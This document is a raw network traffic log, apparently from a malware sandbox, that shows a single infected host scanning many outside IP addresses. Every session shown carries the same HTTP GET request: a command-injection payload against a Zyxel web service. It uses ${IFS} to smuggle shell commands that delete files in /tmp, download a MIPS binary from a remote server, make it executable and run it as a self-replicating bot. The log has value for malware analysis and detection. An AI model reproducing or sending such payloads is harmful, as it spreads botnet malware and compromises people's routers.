                                              Jan 29, 2024 07:03:46.949589968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3591192.168.2.1445814163.67.99.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949618101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3592192.168.2.145674650.171.220.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949654102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3593192.168.2.143914457.55.148.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949731112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3594192.168.2.143938224.163.103.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949736118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3595192.168.2.1459954173.176.173.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949783087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3596192.168.2.1457118144.146.211.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949839115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3597192.168.2.1452886135.80.146.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949865103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3598192.168.2.1445658216.0.82.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949915886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3599192.168.2.1443830157.88.87.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949939013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3600192.168.2.144343449.164.151.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949997902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3601192.168.2.1448704218.154.104.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950030088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3602192.168.2.143657824.154.179.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950063944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3603192.168.2.144059632.51.203.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950105906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3604192.168.2.144215891.33.240.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950146914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3605192.168.2.1437838124.89.8.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950232983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3606192.168.2.1443740208.95.245.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950243950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3607192.168.2.1440570202.228.47.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950289011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3608192.168.2.145984088.166.109.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950313091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3609192.168.2.145067032.115.104.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950339079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3610192.168.2.1459894175.119.60.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950365067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3611192.168.2.1437246212.108.32.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950413942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3612192.168.2.144268040.172.121.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950450897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3613192.168.2.1450156149.106.24.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950499058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3614192.168.2.145901468.238.141.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950514078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3615192.168.2.1453278141.54.124.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950572968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3616192.168.2.1447494211.41.92.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950609922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3617192.168.2.1458380221.192.58.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950634003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3618192.168.2.1440820197.48.246.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950686932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3619192.168.2.1453950162.154.99.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950737953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3620192.168.2.145230276.104.192.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950772047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3621192.168.2.1445930182.26.84.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950812101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3622192.168.2.1442636216.238.70.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950833082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3623192.168.2.1436694219.60.114.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950889111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3624192.168.2.1456832222.66.235.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950900078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3625192.168.2.1447668220.13.68.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.950965881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3626192.168.2.1458770177.242.121.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951011896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3627192.168.2.143637681.200.169.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951069117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3628192.168.2.1455322175.250.215.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951083899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3629192.168.2.144592690.233.180.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951117039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3630192.168.2.1440684175.151.143.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951160908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3631192.168.2.1447414170.207.38.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951181889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3632192.168.2.1455158163.145.97.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951208115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3633192.168.2.1442848155.127.103.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951291084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3634192.168.2.1457280218.92.155.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951293945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3635192.168.2.1439328121.213.16.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951345921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3636192.168.2.144842283.239.6.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951380968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3637192.168.2.143381075.190.162.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951431990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3638192.168.2.1458246114.171.132.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951450109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3639192.168.2.1446066138.32.86.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951500893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3640192.168.2.1448264146.81.138.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951543093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3641192.168.2.1436056192.73.126.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951579094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3642192.168.2.143509689.188.30.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951611996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3643192.168.2.1454664193.43.123.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951658964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3644192.168.2.1442078212.49.132.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951699972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3645192.168.2.1454594218.120.116.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951755047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3646192.168.2.145361464.237.136.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951778889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3647192.168.2.143377062.39.211.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951817989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3648192.168.2.145501281.189.118.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951858044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3649192.168.2.1446518134.171.152.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951921940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3650192.168.2.145094459.183.72.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951952934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3651192.168.2.1443206112.161.158.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.951992989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3652192.168.2.1449046149.15.162.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952033043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3653192.168.2.1457162201.176.219.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.952100992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3654192.168.2.1455402200.234.66.236443
                                              TimestampBytes transferredDirectionData
